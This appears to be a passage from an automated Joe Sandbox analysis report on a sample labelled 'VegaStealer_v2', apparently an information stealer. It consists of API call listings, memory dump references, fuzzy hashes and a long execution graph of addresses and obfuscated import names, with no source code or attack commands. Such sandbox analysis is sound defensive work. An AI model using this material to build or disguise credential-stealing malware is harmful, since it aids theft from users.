                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD1117A1F1D60B86EA78CB55EA9417933E1EF98B80B9458F4C50DC7370DF2CEA459300

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:83.7%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:40%
                                                                                                                                                                                                                                      Total number of Nodes:5
                                                                                                                                                                                                                                      Total number of Limit Nodes:1

                                                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                                                      callgraph 0 Function_00401000 1 Function_00401AE1 1->0

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCommandLineA.KERNEL32 ref: 00401AE1
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000), ref: 00401AF7
                                                                                                                                                                                                                                        • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                                                                                                                                                                                                        • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                                                                                                                                                                                                        • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                                                                                                                                                                                                                        • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                                                                                                                                                                                                        • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                                                                                                                                                                                                                        • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                                                                                                                                                                                                                        • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                                                                                                                                                                                                        • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                                                                                                                                                                                                                        • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.2044084092.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.2043999955.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.2044107105.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.2044139172.0000000000403000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.2044139172.0000000000408000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.2044216641.0000000000411000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.2045917495.0000000000BC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_VegaStealer_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 673778540-0
                                                                                                                                                                                                                                      • Opcode ID: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                                                                                                                                                                                                      • Instruction ID: 8601b60a343ef63eca695c0712cadf30932154ab05066af7af19716e0146d46f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72E06774959300AAE7217F71AE06B143E74E70474BF10407BF6157A1F6EB786A10AB1D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                                                                                                                                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                                                                                                                                                                                                      • RegisterClassExA.USER32(00000030), ref: 0040106E
                                                                                                                                                                                                                                      • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000001,?), ref: 004010BC
                                                                                                                                                                                                                                      • UpdateWindow.USER32(00000001), ref: 004010C7
                                                                                                                                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 004010E4
                                                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 004010ED
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.2044084092.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.2043999955.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.2044107105.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.2044139172.0000000000403000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.2044139172.0000000000408000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.2044216641.0000000000411000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.2045917495.0000000000BC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_VegaStealer_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                                                                                                                                                                                                                      • String ID: 0$WinClass32
                                                                                                                                                                                                                                      • API String ID: 282685165-2329282442
                                                                                                                                                                                                                                      • Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                                                                                                                                                                                                      • Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:5.6%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:11.8%
                                                                                                                                                                                                                                      Signature Coverage:0.9%
                                                                                                                                                                                                                                      Total number of Nodes:964
                                                                                                                                                                                                                                      Total number of Limit Nodes:123
                                                                                                                                                                                                                                      execution_graph 83087 6bc01480 83088 6bc0148b 83087->83088 83089 6bc014c1 83087->83089 83088->83089 83091 6bc51c30 83088->83091 83092 6bc51c43 RtlFreeHeap 83091->83092 83093 6bc51c69 83091->83093 83092->83093 83094 6bc51c51 SI769271af19a2299d 83092->83094 83093->83089 83094->83093 83096 6bc26100 83098 6bc26114 83096->83098 83097 6bc26130 83098->83097 83101 6bc222b0 83098->83101 83100 6bc2612b 83103 6bc222c7 83101->83103 83102 6bc222fc 83102->83100 83103->83102 83108 6bc2230d 83103->83108 83117 6bc1cd00 SIaa0f8e0c251cfd1d RtlAllocateHeap SI769271af19a2299d _memset 83103->83117 83105 6bc22398 83110 6bc1ce80 83105->83110 83107 6bc223aa 83107->83100 83108->83105 83108->83107 83118 6bc0c9a0 SIaa0f8e0c251cfd1d 83108->83118 83111 6bc1ce94 83110->83111 83112 6bc1cf1b 83110->83112 83114 6bc1ce9f 83111->83114 83119 6bc14ba0 SIaa0f8e0c251cfd1d RtlAllocateHeap SI769271af19a2299d wcstoxq 83111->83119 83112->83107 83114->83112 83120 6bc14a90 83114->83120 83117->83108 83118->83105 83119->83114 83121 6bc14a9f 83120->83121 83123 6bc14b2f 83121->83123 83124 6bc13b30 83121->83124 83123->83107 83125 6bc13b3b 83124->83125 83127 6bc13b46 83124->83127 83125->83127 83129 6bc12f30 83125->83129 83127->83123 83128 6bc13b73 83128->83123 83130 6bc12f40 83129->83130 83134 6bc12f9a 83130->83134 83142 6bc127e0 SIaa0f8e0c251cfd1d 83130->83142 83136 6bc12fc4 83134->83136 83138 6bc51c70 RtlAllocateHeap 83134->83138 83135 6bc13000 83135->83128 83136->83128 83139 6bc51c90 SI769271af19a2299d 83138->83139 83140 6bc12fdf 83138->83140 83139->83140 83140->83135 83143 6bc127e0 SIaa0f8e0c251cfd1d 83140->83143 83142->83134 83143->83135 83593 52b04c8 83594 52b04f4 83593->83594 83595 52b0760 83594->83595 83596 52b3790 315 API calls 83594->83596 83598 52b3800 83594->83598 83596->83595 83599 52b384b 83598->83599 83601 6bce19f0 315 API calls 83599->83601 83600 52b3890 83600->83595 83601->83600 83602 6bc67f20 83603 6bc67fd7 83602->83603 83610 6bc67f3c 83602->83610 83605 6bc67fdc 83603->83605 83606 6bc6800f 83603->83606 83608 6bc67ffd SIaa0f8e0c251cfd1d 83603->83608 83604 6bc67f42 wcstoxq 83612 6bc68071 83604->83612 83613 6bc68096 83604->83613 83614 6bc68086 83604->83614 83619 6bc60ad0 83606->83619 83607 6bc680c9 SI769271af19a2299d 83608->83606 83610->83604 83610->83607 83611 6bc6802e 83610->83611 83627 6bc636f0 8 API calls 83613->83627 83626 6bc52840 SI769271af19a2299d 83614->83626 83617 6bc68090 83618 6bc680ae 83620 6bc60b22 83619->83620 83621 6bc60ae2 SI769271af19a2299d 83619->83621 83622 6bc60b7d 83620->83622 83625 6bc60b05 83620->83625 83628 6bc5a830 SI769271af19a2299d SI769271af19a2299d SI769271af19a2299d SI769271af19a2299d SI769271af19a2299d 83620->83628 83621->83625 83624 6bc60b9e SI769271af19a2299d 83622->83624 83622->83625 83624->83625 83625->83610 83626->83617 83627->83618 83628->83622 83629 6bc984a0 83638 6bc98e18 83629->83638 83640 6bc984e3 83629->83640 83630 6bc9903a 83631 6bc99053 83630->83631 83653 6bc33a60 10 API calls 83630->83653 83643 6bc1a520 83631->83643 83635 6bc9907a 83636 6bc33a60 10 API calls 83636->83640 83637 6bc35560 10 API calls 83637->83640 83638->83630 83652 6bc975b0 52 API calls __except_handler4 83638->83652 83639 6bc33ad0 10 API calls 83639->83640 83640->83636 83640->83637 83640->83638 83640->83639 83650 6bc4b3f0 17 API calls 83640->83650 83651 6bc13a30 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d 83640->83651 83654 6bc143a0 83643->83654 83645 6bc1a52d 83649 6bc1a54c 83645->83649 83660 6bc11a20 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d 83645->83660 83647 6bc1a668 SIaa0f8e0c251cfd1d 83647->83635 83648 6bc1a626 83648->83635 83649->83647 83649->83648 83650->83640 83651->83640 83652->83638 83653->83631 83657 6bc1440b 83654->83657 83658 6bc143b4 83654->83658 83656 6bc143a0 37 API calls 83656->83658 83657->83645 83658->83656 83658->83657 83661 6bc12910 37 API calls 83658->83661 83662 6bc07640 SIaa0f8e0c251cfd1d 83658->83662 83660->83645 83661->83658 83662->83658 83663 52bcd40 83664 52bcd5b 83663->83664 83665 52bcd6e 83664->83665 83667 52bcf8a 83664->83667 83668 52bcfb8 83667->83668 83669 52bdc68 SI6039a77d8b3fe4a1 83668->83669 83671 52bdb45 83668->83671 83670 52bdc96 83669->83670 83670->83665 83671->83665 83672 52b8000 83673 52b803d 83672->83673 83674 52b80cf 83672->83674 83673->83674 83675 52b818f 315 API calls 83673->83675 83676 52b81a0 315 API calls 83673->83676 83675->83674 83676->83674 83677 2cc6460 83678 2cc6483 KiUserExceptionDispatcher 83677->83678 83680 2cc649b 83678->83680 83681 6bcd6360 83694 6bc55da0 83681->83694 83683 6bcd6370 83684 6bcd6411 SI769271af19a2299d 83683->83684 83685 6bcd638f 83683->83685 83700 6bc2c670 83685->83700 83687 6bcd63ac 83688 6bcd63ca 83687->83688 83689 6bcd63d1 SIdb45e174afb28e2c 83687->83689 83690 6bcd63de 83689->83690 83691 6bcd63e8 83689->83691 83711 6bc57d70 83691->83711 83693 6bcd6409 83695 6bc55da5 SI769271af19a2299d 83694->83695 83696 6bc55dbd 83694->83696 83695->83683 83697 6bc55dfc 83696->83697 83698 6bc55de4 SI769271af19a2299d 83696->83698 83699 6bc55dcc SI769271af19a2299d 83696->83699 83697->83683 83698->83683 83699->83683 83702 6bc2c68d 83700->83702 83704 6bc2c748 83702->83704 83727 6bc14f00 83702->83727 83703 6bc2c808 83703->83704 83733 6bc1d290 8 API calls 83703->83733 83704->83687 83706 6bc2c865 83706->83704 83734 6bc07640 SIaa0f8e0c251cfd1d 83706->83734 83708 6bc2c875 83735 6bc293c0 10 API calls 83708->83735 83710 6bc2c87b 83710->83687 83712 6bc55da0 3 API calls 83711->83712 83713 6bc57d88 83712->83713 83714 6bc57d8c SI769271af19a2299d 83713->83714 83717 6bc57db4 83713->83717 83714->83693 83715 6bc57e33 83756 6bc52a40 83715->83756 83717->83715 83719 6bc12f30 3 API calls 83717->83719 83720 6bc57df4 83717->83720 83718 6bc57e70 83721 6bc57e1a 83718->83721 83725 6bc57e85 SIaa0f8e0c251cfd1d 83718->83725 83719->83720 83720->83715 83722 6bc57e14 83720->83722 83723 6bc57e9b 83721->83723 83774 6bc12ec0 SIaa0f8e0c251cfd1d 83721->83774 83773 6bc293c0 10 API calls 83722->83773 83723->83693 83725->83721 83728 6bc14f1c 83727->83728 83729 6bc14f0c 83727->83729 83731 6bc13b30 3 API calls 83728->83731 83732 6bc14f17 _memset 83728->83732 83736 6bc2dd50 83729->83736 83731->83732 83732->83703 83733->83706 83734->83708 83735->83710 83737 6bc2dd92 83736->83737 83738 6bc2dd6d 83736->83738 83740 6bc2dd9c 83737->83740 83745 6bc29450 83737->83745 83738->83737 83739 6bc2dd7c 83738->83739 83741 6bc29450 10 API calls 83739->83741 83740->83732 83742 6bc2dd8a 83741->83742 83742->83732 83744 6bc2de33 83744->83732 83746 6bc29460 83745->83746 83747 6bc29481 83745->83747 83749 6bc13b30 3 API calls 83746->83749 83755 6bc293c0 10 API calls 83747->83755 83751 6bc29467 83749->83751 83750 6bc2948c 83750->83744 83752 6bc29479 83751->83752 83754 6bc293c0 10 API calls 83751->83754 83752->83744 83754->83752 83755->83750 83757 6bc52c55 SI769271af19a2299d 83756->83757 83759 6bc52a55 83756->83759 83758 6bc52c78 83757->83758 83758->83718 83759->83757 83760 6bc52ab5 83759->83760 83761 6bc52adf 83760->83761 83763 6bc52a40 16 API calls 83760->83763 83761->83758 83762 6bc2c670 15 API calls 83761->83762 83764 6bc52b83 83762->83764 83765 6bc52b1f 83763->83765 83768 6bc52bc5 83764->83768 83769 6bc52ba5 83764->83769 83765->83758 83766 6bc52a40 16 API calls 83765->83766 83766->83761 83767 6bc2c670 15 API calls 83772 6bc52bed 83767->83772 83768->83767 83768->83772 83775 6bc3df00 11 API calls 83769->83775 83771 6bc52bb6 83771->83718 83772->83718 83773->83721 83774->83723 83775->83771 83776 6bbd3413 83777 6bbd341e 83776->83777 83778 6bbd3423 83776->83778 83794 6bbda8d4 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 83777->83794 83782 6bbd331d 83778->83782 83781 6bbd3431 83784 6bbd3329 __lseeki64 83782->83784 83783 6bbd3376 83792 6bbd33c6 __lseeki64 83783->83792 83847 6bbec390 DisableThreadLibraryCalls 83783->83847 83784->83783 83784->83792 83795 6bbd31b9 83784->83795 83787 6bbd3389 83788 6bbd33a6 83787->83788 83848 6bbec390 DisableThreadLibraryCalls 83787->83848 83789 6bbd31b9 __CRT_INIT@12 149 API calls 83788->83789 83788->83792 83789->83792 83791 6bbd339d 83793 6bbd31b9 __CRT_INIT@12 149 API calls 83791->83793 83792->83781 83793->83788 83794->83778 83796 6bbd31c5 __lseeki64 83795->83796 83797 6bbd31cd 83796->83797 83798 6bbd3247 83796->83798 83849 6bbd4320 HeapCreate 83797->83849 83800 6bbd324d 83798->83800 83801 6bbd32a8 83798->83801 83807 6bbd326b 83800->83807 83813 6bbd31d6 __lseeki64 83800->83813 83859 6bbd79a5 66 API calls _doexit 83800->83859 83802 6bbd32ad 83801->83802 83803 6bbd3306 83801->83803 83864 6bbd6260 TlsGetValue DecodePointer TlsSetValue 83802->83864 83803->83813 83868 6bbd6564 79 API calls __freefls@4 83803->83868 83804 6bbd31d2 83806 6bbd31dd 83804->83806 83804->83813 83850 6bbd65d2 86 API calls 4 library calls 83806->83850 83812 6bbd327f 83807->83812 83860 6bbda46d 67 API calls _free 83807->83860 83809 6bbd32b2 83865 6bbd6142 66 API calls _calloc 83809->83865 83863 6bbd3292 70 API calls __mtterm 83812->83863 83813->83783 83817 6bbd32be 83817->83813 83819 6bbd32ca DecodePointer 83817->83819 83818 6bbd3275 83861 6bbd62b1 70 API calls _free 83818->83861 83826 6bbd32df 83819->83826 83822 6bbd31e2 __RTC_Initialize 83825 6bbd31f2 GetCommandLineA 83822->83825 83840 6bbd31e6 83822->83840 83823 6bbd31eb 83823->83813 83824 6bbd327a 83862 6bbd433e HeapDestroy 83824->83862 83852 6bbda7f1 71 API calls 2 library calls 83825->83852 83829 6bbd32fa 83826->83829 83830 6bbd32e3 83826->83830 83867 6bbd18fd 66 API calls 2 library calls 83829->83867 83866 6bbd62ee 66 API calls 4 library calls 83830->83866 83831 6bbd3202 83853 6bbda228 73 API calls __calloc_crt 83831->83853 83835 6bbd32ea GetCurrentThreadId 83835->83813 83836 6bbd320c 83837 6bbd3210 83836->83837 83855 6bbda736 95 API calls 3 library calls 83836->83855 83854 6bbd62b1 70 API calls _free 83837->83854 83851 6bbd433e HeapDestroy 83840->83851 83841 6bbd321c 83842 6bbd3230 83841->83842 83856 6bbda4c0 94 API calls 6 library calls 83841->83856 83842->83823 83858 6bbda46d 67 API calls _free 83842->83858 83845 6bbd3225 83845->83842 83857 6bbd77b8 77 API calls 4 library calls 83845->83857 83847->83787 83848->83791 83849->83804 83850->83822 83851->83823 83852->83831 83853->83836 83854->83840 83855->83841 83856->83845 83857->83842 83858->83837 83859->83807 83860->83818 83861->83824 83862->83812 83863->83813 83864->83809 83865->83817 83866->83835 83867->83823 83868->83813 83869 6bbf0850 83870 6bbf088d 83869->83870 83871 6bbf0859 83869->83871 83876 6bcc30a0 83870->83876 83874 6bcc30a0 165 API calls 83871->83874 83873 6bbf089f 83875 6bbf0888 83874->83875 83877 6bcc30b9 83876->83877 83883 6bcc30cc 83876->83883 83877->83883 83890 6bcc23a0 83877->83890 83879 6bcc30d3 83879->83873 83880 6bcc3158 83880->83879 83881 6bcc31a9 83880->83881 83882 6bcc31c4 83880->83882 83898 6bc29320 10 API calls 83881->83898 83899 6bc29320 10 API calls 83882->83899 83883->83879 83883->83880 83889 6bcc3145 83883->83889 83896 6bc2c2f0 43 API calls 83883->83896 83887 6bcc31b6 83887->83873 83889->83880 83897 6bc327d0 45 API calls _memset 83889->83897 83891 6bcc23ce 83890->83891 83894 6bcc23dc 83890->83894 83900 6bcc1340 83891->83900 83893 6bcc2419 83893->83883 83894->83893 83895 6bcc1340 163 API calls 83894->83895 83895->83894 83896->83889 83897->83880 83898->83887 83899->83879 83901 6bcc138c 83900->83901 83943 6bcb6b00 83901->83943 83903 6bcc13f0 83904 6bcc1661 83903->83904 83905 6bcc141d 83903->83905 83912 6bcc143f 83903->83912 83907 6bcc193b 83904->83907 83911 6bcc194a 83904->83911 84002 6bc293c0 10 API calls 83904->84002 83908 6bbd1186 __except_handler4 5 API calls 83905->83908 84003 6bc2d160 45 API calls 2 library calls 83907->84003 83909 6bcc143b 83908->83909 83909->83894 83913 6bbd1186 __except_handler4 5 API calls 83911->83913 83915 6bcc15cc 83912->83915 83916 6bcc166c 83912->83916 83972 6bc859e0 83912->83972 83991 6bc12570 25 API calls 83912->83991 83914 6bcc1964 83913->83914 83914->83894 83915->83916 83917 6bcc1640 83915->83917 83921 6bcc1727 83916->83921 83930 6bcc16e0 83916->83930 83992 6bc1d5a0 10 API calls 83917->83992 83919 6bcc164e 83919->83904 83993 6bc07640 SIaa0f8e0c251cfd1d 83919->83993 83994 6bc1d5a0 10 API calls 83921->83994 83922 6bcc1809 83988 6bc293a0 83922->83988 83923 6bcc17d7 83996 6bc1d5a0 10 API calls 83923->83996 83927 6bcc1733 83931 6bcc1746 83927->83931 83995 6bc07640 SIaa0f8e0c251cfd1d 83927->83995 83928 6bcc17e3 83928->83931 83997 6bc07640 SIaa0f8e0c251cfd1d 83928->83997 83930->83922 83930->83923 83931->83904 84001 6bc8b500 59 API calls 83931->84001 83935 6bcc187d 83937 6bcc1892 83935->83937 83998 6bc07640 SIaa0f8e0c251cfd1d 83935->83998 83940 6bcc18a5 83937->83940 83999 6bca0160 156 API calls 83937->83999 83940->83931 84000 6bc2d0e0 44 API calls 83940->84000 83944 6bcb6d0b 83943->83944 83945 6bcb6b23 83943->83945 83944->83903 83946 6bcb6b2c 83945->83946 83952 6bcb6b41 83945->83952 84004 6bc53050 11 API calls 83946->84004 83948 6bcb6d00 84028 6bc53050 11 API calls 83948->84028 83949 6bcb6b37 83949->83903 83950 6bcb6c68 83950->83948 83953 6bcb6c80 83950->83953 83952->83948 83952->83950 83955 6bcb6b77 83952->83955 83954 6bcb6c99 83953->83954 83959 6bcb6cb1 83953->83959 84026 6bc53050 11 API calls 83954->84026 83961 6bcb6bc4 83955->83961 84005 6bc53050 11 API calls 83955->84005 83958 6bcb6ca8 83958->83903 83959->83944 84027 6bc53050 11 API calls 83959->84027 83960 6bcb6c25 84009 6bc97b50 83960->84009 83961->83960 83966 6bcb6c2a 83961->83966 83967 6bcb6c1f 83961->83967 83964 6bcb6c5c 83964->83903 83965 6bcb6cf7 83965->83903 83966->83960 84007 6bc57760 13 API calls 83966->84007 84006 6bc293c0 10 API calls 83967->84006 83970 6bcb6c39 84008 6bc53050 11 API calls 83970->84008 84171 6bc824c0 83972->84171 83974 6bc85a77 83974->83912 83975 6bc85c13 83975->83974 84203 6bc12570 25 API calls 83975->84203 83976 6bc859f2 83976->83974 83976->83975 83980 6bc85b41 83976->83980 84197 6bc6c490 83976->84197 83979 6bc85b54 83979->83912 83980->83975 83980->83979 83981 6bc85bc7 83980->83981 83983 6bc85bf5 83980->83983 84201 6bc0f8c0 SIaa0f8e0c251cfd1d 83981->84201 83983->83975 84202 6bc52840 SI769271af19a2299d 83983->84202 83984 6bc85bdf 83986 6bc68990 3 API calls 83984->83986 83987 6bc85beb 83986->83987 83987->83912 84256 6bc26470 83988->84256 83991->83912 83992->83919 83993->83904 83994->83927 83995->83931 83996->83928 83997->83931 83998->83937 83999->83940 84000->83931 84001->83904 84002->83907 84003->83911 84004->83949 84005->83961 84006->83960 84007->83970 84008->83960 84010 6bc97b5d 84009->84010 84011 6bc97b64 84009->84011 84010->83964 84012 6bc97b6a SI769271af19a2299d SI769271af19a2299d 84011->84012 84014 6bc97b9c 84011->84014 84012->83964 84029 6bc96850 84014->84029 84017 6bc97bd9 84018 6bc97bf5 84017->84018 84019 6bc97be5 84017->84019 84069 6bc12ec0 SIaa0f8e0c251cfd1d 84018->84069 84042 6bc868b0 84019->84042 84022 6bc97bff 84024 6bc868b0 84 API calls 84022->84024 84023 6bc97bee 84023->83964 84025 6bc97c08 84024->84025 84025->83964 84026->83958 84027->83965 84028->83944 84030 6bc9685f 84029->84030 84031 6bc96864 84029->84031 84070 6bc937b0 134 API calls 84030->84070 84034 6bc96879 84031->84034 84071 6bc40f90 11 API calls 84031->84071 84033 6bc96894 84037 6bc21e30 84033->84037 84034->84033 84072 6bc07640 SIaa0f8e0c251cfd1d 84034->84072 84073 6bc1bcd0 10 API calls 84037->84073 84039 6bc21e39 84040 6bc21e6a 84039->84040 84041 6bc21ea5 SIaa0f8e0c251cfd1d 84039->84041 84040->84017 84041->84017 84043 6bc868c8 84042->84043 84067 6bc86e1a 84042->84067 84043->84067 84074 6bc86790 84043->84074 84045 6bc86923 84046 6bc86933 84045->84046 84095 6bc2c4d0 84045->84095 84114 6bc11ca0 84046->84114 84051 6bc868dd 84051->84045 84082 6bc85ca0 84051->84082 84054 6bc07400 3 API calls 84065 6bc86c07 84054->84065 84055 6bc86d12 84056 6bc07400 3 API calls 84055->84056 84057 6bc86d1e 84056->84057 84063 6bc86d3a 84057->84063 84131 6bc12770 SIaa0f8e0c251cfd1d 84057->84131 84058 6bc86944 84125 6bc07400 SIaa0f8e0c251cfd1d 84058->84125 84061 6bc86af8 84061->84054 84066 6bc86d69 84063->84066 84132 6bc11440 SIaa0f8e0c251cfd1d 84063->84132 84065->84055 84068 6bc51c30 2 API calls 84065->84068 84130 6bc25960 37 API calls 84065->84130 84133 6bc0e4c0 SIaa0f8e0c251cfd1d 84066->84133 84067->84023 84068->84065 84069->84022 84070->84031 84071->84034 84072->84033 84073->84039 84078 6bc867a9 84074->84078 84075 6bc8680b 84134 6bc11b40 84075->84134 84078->84075 84140 6bc85690 84078->84140 84079 6bc86815 84081 6bc86850 84079->84081 84154 6bc2d0e0 44 API calls 84079->84154 84081->84051 84083 6bc85cb5 84082->84083 84084 6bc85690 32 API calls 84083->84084 84087 6bc85cce 84084->84087 84085 6bc68820 37 API calls 84086 6bc85d00 84085->84086 84088 6bc85d1b SIaa0f8e0c251cfd1d 84086->84088 84089 6bc85d24 84086->84089 84087->84085 84091 6bc85d4d SIaa0f8e0c251cfd1d 84087->84091 84088->84089 84090 6bc85d44 SIaa0f8e0c251cfd1d 84089->84090 84092 6bc067f0 SIaa0f8e0c251cfd1d 84089->84092 84090->84091 84091->84051 84093 6bc85d38 84092->84093 84093->84090 84096 6bc2c502 _memset 84095->84096 84097 6bc07400 3 API calls 84096->84097 84112 6bc2c54f 84097->84112 84098 6bc2c5de 84099 6bc07400 3 API calls 84098->84099 84103 6bc2c5e8 84099->84103 84100 6bc2c629 84102 6bc07400 3 API calls 84100->84102 84104 6bc2c633 84102->84104 84103->84100 84168 6bc25960 37 API calls 84103->84168 84106 6bc07400 3 API calls 84104->84106 84105 6bc07640 SIaa0f8e0c251cfd1d 84105->84112 84108 6bc2c63c 84106->84108 84111 6bbd1186 __except_handler4 5 API calls 84108->84111 84113 6bc2c667 84111->84113 84112->84098 84112->84105 84165 6bc251d0 37 API calls 84112->84165 84166 6bc12910 37 API calls 84112->84166 84167 6bc0e760 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d 84112->84167 84113->84046 84115 6bc11da1 84114->84115 84118 6bc11cb5 84114->84118 84119 6bc0e8a0 84115->84119 84117 6bc11d8d SIaa0f8e0c251cfd1d 84117->84118 84118->84115 84118->84117 84169 6bc07640 SIaa0f8e0c251cfd1d 84118->84169 84121 6bc0e9a9 84119->84121 84122 6bc0e8be 84119->84122 84120 6bc0e9d2 84120->84058 84121->84120 84170 6bc07640 SIaa0f8e0c251cfd1d 84121->84170 84122->84121 84124 6bc0e953 SIaa0f8e0c251cfd1d 84122->84124 84124->84122 84126 6bc07497 84125->84126 84127 6bc07426 84125->84127 84126->84061 84128 6bc0748c 84127->84128 84129 6bc51c30 2 API calls 84127->84129 84128->84061 84129->84127 84130->84065 84131->84063 84132->84066 84133->84067 84137 6bc11b5d 84134->84137 84138 6bc11c1b 84134->84138 84135 6bc11c01 84136 6bc11c81 SIaa0f8e0c251cfd1d 84135->84136 84135->84138 84136->84138 84137->84135 84139 6bc07640 SIaa0f8e0c251cfd1d 84137->84139 84138->84079 84139->84137 84141 6bc856a6 84140->84141 84142 6bc856c6 84141->84142 84159 6bc6bde0 24 API calls 84141->84159 84145 6bc856ec 84142->84145 84160 6bc6ba10 25 API calls 84142->84160 84151 6bc8578a 84145->84151 84161 6bc823f0 24 API calls 84145->84161 84148 6bc85792 84148->84078 84149 6bc85780 84163 6bc0c340 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d 84149->84163 84155 6bc21f20 84151->84155 84152 6bc85708 84152->84149 84162 6bc12570 25 API calls 84152->84162 84154->84081 84157 6bc21f34 84155->84157 84156 6bc21f41 84156->84148 84157->84156 84164 6bc12570 25 API calls 84157->84164 84159->84142 84160->84145 84161->84152 84162->84149 84163->84151 84164->84156 84165->84112 84166->84112 84167->84112 84168->84103 84169->84118 84170->84120 84180 6bc824ee 84171->84180 84189 6bc826f0 84171->84189 84173 6bc82750 84176 6bbd1186 __except_handler4 5 API calls 84173->84176 84174 6bc82735 84215 6bc11530 SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d SIaa0f8e0c251cfd1d 84174->84215 84179 6bc82766 84176->84179 84177 6bc82544 84210 6bc11530 